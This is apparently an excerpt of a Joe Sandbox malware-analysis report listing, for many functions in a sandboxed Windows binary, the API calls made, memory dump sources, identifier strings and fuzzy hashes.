                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00B85D69
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B85D7B
                                                                                                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B85DCF
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B85DDD
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00B85DEF
                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B85E31
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00B85E44
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B85E5A
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00B85E67
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                        • Opcode ID: 373da03e4242da107d03b49b5f8beeac1b052be96f0160fb60acd9a2d34e7a78
                                                                                                                                        • Instruction ID: 8abd453fc52ec66e7e0bd3b3ddca474c7eda3bca3ecbef1add2d67ccaa485222
                                                                                                                                        • Opcode Fuzzy Hash: 373da03e4242da107d03b49b5f8beeac1b052be96f0160fb60acd9a2d34e7a78
                                                                                                                                        • Instruction Fuzzy Hash: 0E51FF71A00605AFDB18DF68DD89EAEBBF5FB48301F148269F916E7290DB709E04CB50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B38BE8,?,00000000,?,?,?,?,00B38BBA,00000000,?), ref: 00B38FC5
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00B38C81
                                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00B38BBA,00000000,?), ref: 00B38D1B
                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00B76973
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00B38BBA,00000000,?), ref: 00B769A1
                                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00B38BBA,00000000,?), ref: 00B769B8
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B38BBA,00000000), ref: 00B769D4
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B769E6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 641708696-0
                                                                                                                                        • Opcode ID: de90179dc08d818640d46bc7c647afb5856fbf1fd1786d9ccc469841c9316274
                                                                                                                                        • Instruction ID: aa234bbb324c5fc3f3466804a298cc3b8fa40b3c4f7979f1deb5e465d7825101
                                                                                                                                        • Opcode Fuzzy Hash: de90179dc08d818640d46bc7c647afb5856fbf1fd1786d9ccc469841c9316274
                                                                                                                                        • Instruction Fuzzy Hash: 66618C31501B00DFCB25DF29D948B257BF1FB54312F6499A8E0469B560CFB1AD81CBA2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39944: GetWindowLongW.USER32(?,000000EB), ref: 00B39952
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00B39862
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                        • Opcode ID: 1cb48c2e7f2697ac63d51c5b51d221846167ce38ec1402bcbfc8eb2ee5dab906
                                                                                                                                        • Instruction ID: bfe65a267160e14279176f4e2afec28105416ba9b4c485d53edf35ae8f5692a7
                                                                                                                                        • Opcode Fuzzy Hash: 1cb48c2e7f2697ac63d51c5b51d221846167ce38ec1402bcbfc8eb2ee5dab906
                                                                                                                                        • Instruction Fuzzy Hash: 5241A031144640AFDB209F3C9C84BBA3BE5EB56370F244695F9B6972E1CBB19C42DB20
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00B6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00B89717
                                                                                                                                        • LoadStringW.USER32(00000000,?,00B6F7F8,00000001), ref: 00B89720
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00B6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00B89742
                                                                                                                                        • LoadStringW.USER32(00000000,?,00B6F7F8,00000001), ref: 00B89745
                                                                                                                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00B89866
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                                        • Opcode ID: 25d9b45ee5eff2951a855d365f5fbd2e05ed2491f1f620eef568884cbe559a52
                                                                                                                                        • Instruction ID: 2c6156d6f106cf230d0cc089e4cf3fb66c10ecf91ffecde27e5339cce97d1623
                                                                                                                                        • Opcode Fuzzy Hash: 25d9b45ee5eff2951a855d365f5fbd2e05ed2491f1f620eef568884cbe559a52
                                                                                                                                        • Instruction Fuzzy Hash: 51410C72800219AACF04FBE0ED96DEEB7F8AF15740F5405A5F509720A2EB756F48CB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B807A2
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B807BE
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B807DA
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B80804
                                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B8082C
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B80837
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B8083C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                                        • Opcode ID: d52a0ba6dca7e20a13e3d0519f21569749e23489c2a24ee00048bd842a386406
                                                                                                                                        • Instruction ID: 032d9ef59520ea5e71f37c9d5874400202ca9c3b0c3115697710662ccb4247ea
                                                                                                                                        • Opcode Fuzzy Hash: d52a0ba6dca7e20a13e3d0519f21569749e23489c2a24ee00048bd842a386406
                                                                                                                                        • Instruction Fuzzy Hash: 8D411976C10229ABCF21EFA4EC858EDB7B8FF04750F4445A9E905A7161EB705E48CBA0
                                                                                                                                        APIs
                                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BB403B
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00BB4042
                                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BB4055
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00BB405D
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BB4068
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00BB4072
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BB407C
                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00BB4092
                                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00BB409E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                                        • Opcode ID: 3e7e6c7a5dda9bff55ff1d7e4b61a87f463309b31a855aeae5ea01c88eb73fd4
                                                                                                                                        • Instruction ID: d024609c6571df9ba2250614661742d436ba71cdd699c9a4473c18b0dd459fff
                                                                                                                                        • Opcode Fuzzy Hash: 3e7e6c7a5dda9bff55ff1d7e4b61a87f463309b31a855aeae5ea01c88eb73fd4
                                                                                                                                        • Instruction Fuzzy Hash: DC314B32501219ABDF219FA8DC49FEA3FA8FF0D720F110351FA55A61A1CBB5D810DB64
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00BA3C5C
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00BA3C8A
                                                                                                                                        • CoUninitialize.OLE32 ref: 00BA3C94
                                                                                                                                        • _wcslen.LIBCMT ref: 00BA3D2D
                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00BA3DB1
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BA3ED5
                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00BA3F0E
                                                                                                                                        • CoGetObject.OLE32(?,00000000,00BBFB98,?), ref: 00BA3F2D
                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00BA3F40
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BA3FC4
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BA3FD8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 429561992-0
                                                                                                                                        • Opcode ID: a8ebcf5c618aec79fa7ccd8c401a5692540ddbc9e1fb9eb37ed4df3a438a2101
                                                                                                                                        • Instruction ID: 6b3a03849345513e1ead20955e8a0fb48bfee91e411165b49bbf0001ba2cd9f0
                                                                                                                                        • Opcode Fuzzy Hash: a8ebcf5c618aec79fa7ccd8c401a5692540ddbc9e1fb9eb37ed4df3a438a2101
                                                                                                                                        • Instruction Fuzzy Hash: F1C138716083059FD700DF68C88492BBBE9FF8AB44F1449ADF9899B211DB71ED05CB52
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B97AF3
                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B97B8F
                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00B97BA3
                                                                                                                                        • CoCreateInstance.OLE32(00BBFD08,00000000,00000001,00BE6E6C,?), ref: 00B97BEF
                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B97C74
                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00B97CCC
                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00B97D57
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B97D7A
                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00B97D81
                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00B97DD6
                                                                                                                                        • CoUninitialize.OLE32 ref: 00B97DDC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2762341140-0
                                                                                                                                        • Opcode ID: c483e430b8030845315ac21f26f910cc8a14138fe6b546c7324f982cc5910803
                                                                                                                                        • Instruction ID: 073da99ef6a32af33ba0bb7c2a89f04bfac9dc62bb8455a4034b0c919ca0dc0a
                                                                                                                                        • Opcode Fuzzy Hash: c483e430b8030845315ac21f26f910cc8a14138fe6b546c7324f982cc5910803
                                                                                                                                        • Instruction Fuzzy Hash: 4AC13A75A04119AFCB14DFA4C894DAEBBF9FF48304B1485A9F8199B361DB30EE41CB90
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BB5504
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB5515
                                                                                                                                        • CharNextW.USER32(00000158), ref: 00BB5544
                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BB5585
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BB559B
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB55AC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CharNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1350042424-0
                                                                                                                                        • Opcode ID: 2817ee7ccf2a39c232c6cbb193629cf9cc4755ffa6cdc25faf2768ddffe7223c
                                                                                                                                        • Instruction ID: 6f2b0206f37960bb4fbfab07b07c1ac5b7bfbdf847252bf23c188b5c16508c52
                                                                                                                                        • Opcode Fuzzy Hash: 2817ee7ccf2a39c232c6cbb193629cf9cc4755ffa6cdc25faf2768ddffe7223c
                                                                                                                                        • Instruction Fuzzy Hash: 5A615A70900608AFDB20DF54CC85EFE7BB9EB09721F104585F965AB290DBB49A81DB62
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B7FAAF
                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00B7FB08
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B7FB1A
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B7FB3A
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00B7FB8D
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B7FBA1
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B7FBB6
                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00B7FBC3
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B7FBCC
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B7FBDE
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B7FBE9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                        • Opcode ID: e174379f9ff5c0870b7a0347725a72540e20f5cf6a7a1d2a068c69d89add107d
                                                                                                                                        • Instruction ID: 1454d63074824d1c44761ecd547d17369dc48e5125bf78b44cc06de129fe1f21
                                                                                                                                        • Opcode Fuzzy Hash: e174379f9ff5c0870b7a0347725a72540e20f5cf6a7a1d2a068c69d89add107d
                                                                                                                                        • Instruction Fuzzy Hash: 61414F35A0021ADFCF00DF68D8549BEBBF9EF48344F00C4A5E959A7361CB70AA45CBA4
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00B89CA1
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00B89D22
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00B89D3D
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00B89D57
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00B89D6C
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00B89D84
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B89D96
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00B89DAE
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00B89DC0
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00B89DD8
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00B89DEA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: bdf135c759e78cb0b0d9266176178304e636725f31d74c37f6bd8a13578a889d
                                                                                                                                        • Instruction ID: 6cade90a96b63ac05be2858e3dc6ef34d332d6c299c2d4a9bfaf53bfda6bb936
                                                                                                                                        • Opcode Fuzzy Hash: bdf135c759e78cb0b0d9266176178304e636725f31d74c37f6bd8a13578a889d
                                                                                                                                        • Instruction Fuzzy Hash: 0241B6346047C96EFF35A664C8043B5BEE0EB11344F0C80EADAC6575D2DBE599C8CBA6
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00BA05BC
                                                                                                                                        • inet_addr.WSOCK32(?), ref: 00BA061C
                                                                                                                                        • gethostbyname.WSOCK32(?), ref: 00BA0628
                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00BA0636
                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA06C6
                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA06E5
                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00BA07B9
                                                                                                                                        • WSACleanup.WSOCK32 ref: 00BA07BF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                        • String ID: Ping
                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                        • Opcode ID: 2c5a260407cc6fe95cf29903b6d9102649e0a5e584be1dc666859e3bc055f65e
                                                                                                                                        • Instruction ID: 9116b3fdd5bb6cc9d9b504c448816ed7c38d4e0e30c7977012723bf89ce9bfec
                                                                                                                                        • Opcode Fuzzy Hash: 2c5a260407cc6fe95cf29903b6d9102649e0a5e584be1dc666859e3bc055f65e
